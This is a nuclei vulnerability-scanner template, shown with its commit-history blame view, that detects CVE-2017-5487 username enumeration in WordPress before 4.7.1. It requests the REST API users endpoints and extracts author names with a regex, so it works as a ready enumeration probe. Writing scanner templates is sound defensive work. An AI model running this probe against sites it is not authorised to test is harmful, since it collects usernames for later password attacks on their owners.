nuclei-templates/cves/2017/CVE-2017-5487.yaml

id: CVE-2017-5487

info:
  name: WordPress Core < 4.7.1 - Username Enumeration
  author: Manas_Harsh,daffainfo,geeknik
  severity: info
  description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
  tags: cve,cve2017,wordpress
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
    - https://www.exploit-db.com/exploits/41497

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users/"
      - "{{BaseURL}}/?rest_route=/wp/v2/users/"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

      - type: word
        words:
          - '"id":'
          - '"name":'
          - '"avatar_urls":'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - '"name":"[^"]*"'
Template rename / update 2021-06-10 16:27:07 +00:00			`id: CVE-2017-5487`

			`info:`
			`name: WordPress Core < 4.7.1 - Username Enumeration`
Update CVE-2017-5487.yaml Fixes #1985 2021-07-13 18:58:52 +00:00			`author: Manas_Harsh,daffainfo,geeknik`
Severity update as this directly doesn't pose any risk. 2021-07-11 08:09:21 +00:00			`severity: info`
Template rename / update 2021-06-10 16:27:07 +00:00			`description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.`
			`tags: cve,cve2017,wordpress`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2017-5487`
			`- https://www.exploit-db.com/exploits/41497`
Template rename / update 2021-06-10 16:27:07 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/wp-json/wp/v2/users/"`
			`- "{{BaseURL}}/?rest_route=/wp/v2/users/"`
Update CVE-2017-5487.yaml 2021-09-02 07:46:45 +00:00
Update CVE-2017-5487.yaml 2021-09-01 23:59:23 +00:00			`stop-at-first-match: true`
Template rename / update 2021-06-10 16:27:07 +00:00			`matchers-condition: and`
			`matchers:`
Update CVE-2017-5487.yaml Fixes #1985 2021-07-13 18:58:52 +00:00			`- type: word`
			`part: header`
			`words:`
			`- "application/json"`

Template rename / update 2021-06-10 16:27:07 +00:00			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`words:`
			`- '"id":'`
			`- '"name":'`
			`- '"avatar_urls":'`
Update CVE-2017-5487.yaml Fixes #1985 2021-07-13 18:58:52 +00:00			`condition: and`
Update CVE-2017-5487.yaml 2021-09-02 07:46:45 +00:00
update to CVE-2017-5487, added extractor 2021-08-02 05:08:39 +00:00			`extractors:`
			`- type: regex`
			`part: body`
			`regex:`
Update CVE-2017-5487.yaml 2021-09-01 23:59:23 +00:00			`- '"name":"[^"]*"'`